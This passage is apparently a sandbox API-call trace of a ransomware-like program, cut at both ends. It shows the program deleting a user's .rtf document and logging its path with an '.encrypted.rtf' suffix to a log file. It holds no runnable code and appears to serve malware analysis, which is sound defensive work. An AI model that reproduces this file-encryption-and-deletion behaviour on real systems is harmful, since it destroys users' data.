hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.108] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.108] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.108] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.108] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.108] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.109] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.109] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\mtggv.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0035.109] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.110] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.110] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.110] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.110] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.110] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.110] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.110] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.110] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.111] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.111] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.111] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.111] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.111] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpFilePart=0x0) returned 0x61 [0035.111] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0x14a33ba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 0x7c2240 [0035.111] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\mtggv.rtf")) returned 1 [0035.112] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce4aaa0, ftCreationTime.dwHighDateTime=0x1d5ba70, ftLastAccessTime.dwLowDateTime=0xf3cf07c0, ftLastAccessTime.dwHighDateTime=0x1d5be20, ftLastWriteTime.dwLowDateTime=0x14a33ba0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x4284, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="MTGgV.rtf", cAlternateFileName="")) returned 0 [0035.112] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.113] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.113] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.113] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.114] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.114] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.114] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0035.114] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.114] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.114] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0035.114] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x17a0, lpOverlapped=0x0) returned 1 [0035.115] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0035.115] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x17a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.115] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0035.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0035.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.encrypted.rtf\r\n", cchWideChar=110, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 110 [0035.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6e) returned 0x7db378 [0035.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.encrypted.rtf\r\n", cchWideChar=110, lpMultiByteStr=0x7db378, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\MTGgV.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 110 [0035.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0035.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0035.115] WriteFile (in: hFile=0x128, lpBuffer=0x7db300*, nNumberOfBytesToWrite=0x6d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db300*, lpNumberOfBytesWritten=0x6aee3c*=0x6d, lpOverlapped=0x0) returned 1 [0035.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0035.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.115] CloseHandle (hObject=0x128) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.117] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0035.117] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0035.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0035.118] RtlAllocateHeap 